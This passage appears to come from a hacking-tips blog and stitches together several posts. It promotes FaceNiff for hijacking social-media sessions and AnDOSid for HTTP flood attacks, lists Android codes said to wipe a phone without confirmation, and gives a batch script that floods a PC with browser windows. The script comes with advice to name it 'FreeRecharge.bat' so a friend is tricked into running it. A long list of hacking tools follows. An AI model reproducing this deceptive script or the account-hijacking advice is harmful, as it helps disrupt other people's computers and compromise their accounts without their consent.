Your Facebook account is at risk, just like a Firesheep (for firefox hacking) there is a FaceNiff for hijacking the session of famous social networking websites includes facebook and twitter. FaceNiff is developed by Bartosz Ponurkiewicz who created Firesheep before but faceniff is for android OS.
Click to Download


4. AnDOSid- DOS Tool for Android:
DOS or denial of service attack is very dangerous attack because it takes down the server
(computer).AnDOSid allows security professionals to simulate a DOS attack (A http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.AnDOSid is designed for security professionals only!
Click to Download


5. SSHDroid- Android Secure Shell:
Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android.
This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell").
Click to Download


Enjoy......

Best Android Hacking Tips and Tricks



Android is the Linux based operating system designed primarily for touch screen mobile phones. Now a days android phones are so much popular that they covered almost 65% of total mobile phones market.They are rich in functionality as well as user friendly. Many android users don’t know much about the hidden features of android phones. Today we are sharing an article which will tell you the best secret android tricks and hidden features of android phones. Different versions of android versions support different set of android tricks, so try all the following android tricks. I am not sure which will going to work on your handset.





1) Force reboot:
Many times android users face a problem of freezing of mobile phone, In case your android phone is frozen, you can reboot it using an android trick.

Just press Power Button+ Home Key + Volume up button simultaneously.

2) Quick Google Access:
Android phones built primarily for internet, many of android users don’t know that android phones provide a way by which we can access Google search in just a single click. To use this android trick,

Press menu key and hold it for couple of seconds, it will launch the Google search.

3) Reboot Android in safe mode:
As like computers, we can also reboot android phones in safe mode. The latest android jelly bean version provides an option to reboot in safe mode, if something goes wrong.
To reboot your android in safe mode, follow the below given instructions.


*Long press the power button
*Long press on the power off option.

Android phone will show a confirmation message about rebooting it in safe mode, if we reboot android phone in safe mode then all the 3rd party application will be disabled. These applications can again be enabled when we reboot our phone normally. This is a great android utility in case when, one of your 3rd party application is causing trouble for you and you want to hunt it.

4) Unlock android phones by face detection:
This is a cool android trick by which you can unlock your phone by using face detection, In the jelly bean version, android provides a way by which android phone can be unlock using face detection, to make this feature more secure, jelly bean version added another layer of protection in which android phone can be unlocked only when the face is matched as well as we have to blink eyes in order to unlock phone. Blinking eyes tells the android security system that person is live and it’s not an illegal attempt of unlocking using a still image.
To activate this,

Go to Settings > Security > Screen lock > Face unlock.


5) Get detailed information about phone status:
We can get the detailed statistics like phone information, battery information, usage statistics and WiFi information by just dialing *#*#4636#*#*

This is a handy USSD to get the details about battery usage, DNS check, Ping, Application time usage time and so on.

6) Move android apps to SD card:
Its good idea to install android apps in SD card, but what if you installed apps on your phone memory. Don’t worry android phones provide a way by which we can move our apps to SD card. To move apps to SD card, follow these steps:

Go to settings > Application settings > Manage application > Select the application, You will see the option “Move to SD card”.

7) Hard Reset and Factory reset your android phone:
This android trick comes handy at the time of selling an android phone. Android phone can be formatted in two ways

Factory reset
Hard reset

a) Factory reset: In factory reset, your phone is being formatted to factory level. Means all the settings will go by default and all the internal data will be deleted. To factory reset a phone dial *#*#7780#*#*.

b) Hard reset: To hard reset a phone dial *2767*3855#, this will delete all the data (including internal and External SD data) as well as settings of android phone. Don’t try this code for testing purpose, until you are not sure. It will not ask for a confirmation.

8) Context menu in android:
long press on the screen, will show you additional options for customizing android phones. This context menu is somewhat similar to the right click menu of most operating systems.

9) Taking screen shots on android phone:
Android phones offer a great feature by which we can take the screen shot without using any 3rd party application. However the screen shot android tricks vary from one android version to another version.

Press the Home button + power button (This trick work on most android phones.)
For Galaxy Nexus: Power button + volume down button.
For Galaxy Note 2 and S3: Swipe your palm on the screen to take screen shot.

10) Android Version Animation:
This is another cool android trick to play with your android phone.
To use this android trick, Go to settings > about phone > Tab repeatedly on ‘Android version’.

HOW TO CRASH ANY INTERNET BROWSER



Friends, today i’ll share how to crash internet
browser of your friends. Before explaining this
trick let me tell you how this trick will work. You
know what happens if a browser have to open 100
website at once, it’ll crash. So let start the trick. .
STEP 1.
Open notepad
STEP 2.
Copy and paste below code in NOTEPAD.
@echo off start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com start www.Google.com start
www.Google.com

STEP 3.
Save it as (any name).bat [I recommend you to
give any interesting name so that your friend must
click on this file. e.g FreeRecharge.bat]
STEP 4.
Give it to your friends in his pen drive, when he’ll
click on it ,then boom. . you can also check it on
your pc, it is not so harmful..

Saturday 8 March 2014

Greatest Hacking Tools



Some would say that hacking has been simplified by the array of hacking tools that are available nowadays. While that remains a topic for another discussion, if there's one thing that the tech world unanimously agrees on, it is the usefulness of these tools. Whether it is wireless hacking, network security, encryption, intrusion detection or anything else, there is a tool available for it.


Here are the top some hacking tools being used by pros around the world nowadays.




Wireless Hacking: These are tools that help you hack into wireless networks. Wireless hacking tools though useful, do not make you a complete hacker. In order to achieve that, you must learn the different ways in which a secure network can be accessed. Also, you should work on making your own network as secure as possible.

1. Aircrack-ng

2. Kismet

3. inSSIDer

4. KisMAC

Intrusion Detection Systems: Intrusion detection tools are one of the most important part of any security arrangement. They allow you to detect those threats that are potentially dangerous for your system.

1. Snort

2. NetCop

Port Scanners

1. Nmap


2. Superscan

3. Angry IP Scanner

Encryption Tools: In an age where more and more governments are being found spying on their own citizens, encryption is the word of the day. These tools allow you to encrypt your data so that even if someone does get through, they can’t get to the data easily.

1. TrueCrypt

2. OpenSSH

3. Putty

4. OpenSSL

5. Tor

6. OpenVPN

7. Stunnel

8. KeePass

Password Crackers: The name is pretty self explanatory in this case. These tools help you recover passwords from the data that a computer system is storing or transmitting over a network.

1. Ophcrack

2. Medusa

3. RainbowCrack

4. Wfuzz

5. Brutus

6. L0phtCrack

7. fgdump

8. THC Hydra

9. John The Ripper

10. Aircrack - Aircrack is 802.11 WEP and WPA-PSK keys cracking program.

11. Cain and Abel

Packet Crafting: Packet crafting is the technique through which an attacker finds vulnerabilities or entry points within your firewall. These tools help you achieve that more easily.

1. Hping

2. Scapy

3. Netcat

4. Yersinia

5. Nemesis

6. Socat

Traffic Monitoring: These are tools that let you monitor what websites your employees or children are monitoring.

1. Splunk

2. Nagios

3. P0f

4. Ngrep

Packet Sniffers: These are tools that can allow you to capture and visualise the traffic that is coming on your website.

1. Wireshark

2. Tcpdump

3. Ettercap

4. dsniff

5. EtherApe

Vulnerability Exploitation: These are the tools that you would use in order to gain access to various places.

1. Metasploit

2. sqlmap

3. sqlninja

4. Social Engineer Toolkit

5. NetSparker

6. BeEF

7. Dradis

For 50 more of such free hacking tools, click here

Vulnerability Scanners: These are programs that have been designed to asses a computer or network’s vulnerability to attacks. The functionality of these tools varies from one to the other, but they all present a detailed analysis of how vulnerable your system is.

1. Nessus

2. OpenVAS

3. Nipper

4. Secunia PSI

5. Retina

6. QualysGuard

7. Nexpose

Web Vulnerability Scanners: While vulnerability scanners are meant for your system, web vulnerability scanners assess the vulnerability of web applications. The identify the security vulnerabilities that your app may have through various tests.

1. Burp Suite

2. WebScarab

3. Websecurify

4. Nikto

5. w3af

Web Proxies: Proxies were originally created in order to add encapsulation to distributed systems. The client contacts a proxy server in order to request an item that exists on your server.

1. Paros

2. Fiddler

3. Ratproxy

4. sslstrip

Rootkit Detectors: This tool is a file and directory integrity checker. It verifies if a file is trustworthy and informs the user if found otherwise.

1. AIDE (Advanced Intrusion Detection Environment)

Firewalls: You obviously know what a Firewall is. These monitor and control the traffic in your network, whether incoming or outgoing. They are essential security tools that are used by the most novice to the most advanced users.

1. Netfilter

2. PF: OpenBSD Packet Filter

Fuzzers: The concept of fuzzing is usually put to use in order to test the security vulnerabilities of computer systems or in the software that runs on them.

1. skipfish

2. Wfuzz

3. Wapiti

4. W3af

Forensics: This refers to tools that are used for computer forensic. They are used in order to find evidence that is existing in computer systems.

1. Sleuth Kit

2. Helix

3. Malteg0

4. Encase

Debuggers: These are tools that are used in order to write exploits, reverse engineer binary files and to analyse malware.

1. GDB

2. Immunity Debugger

Hacking Operating Systems: These are operating systems that have been designed specifically for hackers. These distros are preloaded with tools that a hacker needs etc.

1. Backtrack 5r3

2. Kali Linux

3. SELinux

4. Knoppix

5. BackBox Linux

6. Pentoo

7. Matriux Krypton

8. NodeZero

9. Blackbuntu

10. Samurai Web Testing Framework

11. WEAKERTH4N

12. CAINE (Computer Aided Investigative Environment)

13. Bugtraq

14. DEFT

15. Helix

Other Hacking Tools: There are also other miscellaneous hacking tools that are often used by hackers. They can’t be put into a particular category, but they are still quite useful.

1. Netcat

2. Traceroute

3. Ping.eu

4. Dig

5. cURL